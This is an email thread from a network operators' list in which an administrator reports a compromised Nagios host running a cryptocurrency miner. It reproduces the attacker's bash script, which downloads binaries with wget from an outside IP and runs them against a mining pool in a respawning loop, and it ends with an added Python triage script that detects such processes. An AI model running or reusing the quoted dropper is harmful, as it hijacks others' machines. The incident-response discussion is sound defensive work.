All,

This looks like it's some form of cryptocurrency miner "xptMiner.exe", think that one's a RieCoin one...

Undoubtedly the servers in use are compromised in some way but may be worth an abuse message to the contact on the RIR record in whois?

Gavin, have sent you an e-mail off topic as well with a little more info, hope it was useful.

---
Gary Steers
Chief Network Engineer | Boosty

On 20 April 2014 19:56, Gavin Henry <[email protected]> wrote:
> Hi all,
>
> Not usually a post you see on uknof, but wanted some help and to check
> if anyone else has seen this?
>
> We've just started getting alerts from one of our servers for high load
> and discovered a weird process:
>
> nagios 285936 0.0 0.0 10744 1468 ? S 19:03 0:00 bash /tmp/toplel
> nagios 292199 102 0.5 3261868 362816 ? Rl 19:39 0:15 \_ /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s 2965706752
>
> root@hostname:/tmp# ls -lh
> total 1016K
> -rw-r--r-- 1 nagios nagios 0 Apr 20 18:26 lllll
> -rwxrwxrwx 1 nagios nagios 615 Apr 20 19:05 toplel
> -rwxrwxrwx 1 nagios nagios 1008K Apr 19 21:59 w00t
>
> No idea where it came from. All our stuff has OpenSSL updated as is
> our Nagios. w00t is a binary, toplel is a bash script containing:
>
> #!/bin/bash
> if [ $1 -le 10 ] ; then
> NUM = $(expr $1 + 1)
> nohup bash $0 $NUM >/dev/null 2>&1 &
> exit
> fi
> CORECOUNT=$(cat /proc/cpuinfo | grep -c processor)
> FREE=$(free -b | head -n2 | tail -n1 | awk '{print $4}')
> FREE=$(expr $FREE - 52428800)
> FREE=$(expr $FREE / $CORECOUNT)
>
> while true; do
> killall w00t
> wget http://162.213.24.40/nope-sse4 -O /tmp/w00t
> chmod 777 /tmp/w00t
> /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s $FREE
>
> wget http://162.213.24.40/nope-nse4 -O /tmp/w00t
> chmod 777 /tmp/w00t
> /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s $FREE
>
> sleep 300
> done;
>
> --
> Kind Regards,
> Gavin Henry.
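Added example (not part of the thread, and not code from either poster): a small Python triage script that parses `ps auxf`-style and `ls -l`-style output like the listings quoted above and flags the three indicators they show: a service account executing something from /tmp, /var/tmp or /dev/shm; a command line carrying a pool-miner style `-o <url>:<port> ... -u <worker>` login; and world-writable executables sitting in a scratch directory. The sample input is constructed from the quoted listings plus one benign daemon line for contrast; the scratch-directory list and the argument pattern are assumptions, not signatures from any product.

```python
"""Triage helper: flag miner-like processes and world-writable scratch
binaries in captured `ps auxf` and `ls -l` output.  Added example, not code
from the thread; the directory list and argument pattern are assumptions."""
import re

# Constructed sample: the two process lines and the /tmp listing quoted in the
# thread, plus one benign nagios daemon line added here for contrast.
PS_SAMPLE = """\
nagios 285936 0.0 0.0 10744 1468 ? S 19:03 0:00 bash /tmp/toplel
nagios 292199 102 0.5 3261868 362816 ? Rl 19:39 0:15 \\_ /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s 2965706752
root 1234 0.0 0.1 20000 3000 ? Ss 18:00 0:01 /usr/sbin/nagios -d /etc/nagios/nagios.cfg
"""
LS_SAMPLE = """\
total 1016K
-rw-r--r-- 1 nagios nagios 0 Apr 20 18:26 lllll
-rwxrwxrwx 1 nagios nagios 615 Apr 20 19:05 toplel
-rwxrwxrwx 1 nagios nagios 1008K Apr 19 21:59 w00t
"""

# Assumed scratch locations a service account should not be executing from.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Assumed signature of a pool-miner invocation: "-o <scheme>://host:port" plus
# a "-u <worker>" login, as seen in the quoted w00t command line.
MINER_ARGS = re.compile(r"-o\s+\S+://\S+:\d+\b.*\s-u\s+\S+")


def parse_ps_line(line):
    """Split one `ps aux` row into (user, pid, command); None if malformed."""
    fields = line.split(None, 10)        # 11 columns; the command keeps its spaces
    if len(fields) < 11 or not fields[1].isdigit():
        return None
    cmd = fields[10].lstrip("\\_| ")      # drop the `ps f` tree prefix
    return fields[0], int(fields[1]), cmd


def flag_process(cmd):
    """Return the list of reasons this command line looks suspicious."""
    reasons = []
    tokens = cmd.split()
    # Catches both "bash /tmp/toplel" (interpreter + script) and "/tmp/w00t".
    if any(tok.startswith(SCRATCH_DIRS) for tok in tokens[:2]):
        reasons.append("executes from scratch directory")
    if MINER_ARGS.search(cmd):
        reasons.append("miner-style pool/worker arguments")
    return reasons


def find_suspicious_processes(ps_output):
    """Return [{user, pid, cmd, reasons}] for every flagged row in ps output."""
    hits = []
    for line in ps_output.splitlines():
        parsed = parse_ps_line(line)
        if parsed is None:
            continue
        user, pid, cmd = parsed
        reasons = flag_process(cmd)
        if reasons:
            hits.append({"user": user, "pid": pid, "cmd": cmd, "reasons": reasons})
    return hits


def find_world_writable_executables(ls_output):
    """Return [{name, owner, mode}] for world-writable files with any execute bit."""
    hits = []
    for line in ls_output.splitlines():
        fields = line.split(None, 8)     # mode links owner group size mon day time name
        if len(fields) < 9 or len(fields[0]) != 10:
            continue                     # skips "total ..." and anything malformed
        mode, owner, name = fields[0], fields[2], fields[8]
        world_writable = mode[8] == "w"
        executable = "x" in (mode[3], mode[6], mode[9])
        if world_writable and executable:
            hits.append({"name": name, "owner": owner, "mode": mode})
    return hits


if __name__ == "__main__":
    for p in find_suspicious_processes(PS_SAMPLE):
        print(f"[process] pid={p['pid']} user={p['user']} {'; '.join(p['reasons'])}: {p['cmd']}")
    for f in find_world_writable_executables(LS_SAMPLE):
        print(f"[file] {f['mode']} {f['owner']} {f['name']}")
```

Run against live output (`ps auxf | python3 triage.py` style piping is a trivial change) it gives a first-pass list to pair with the usual follow-ups: check the flagged PIDs' open sockets, preserve the /tmp files before cleaning up, and pull the 162.213.24.40 and 128.65.210.244 addresses from the quoted script into an egress block and the abuse report Gary suggests.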
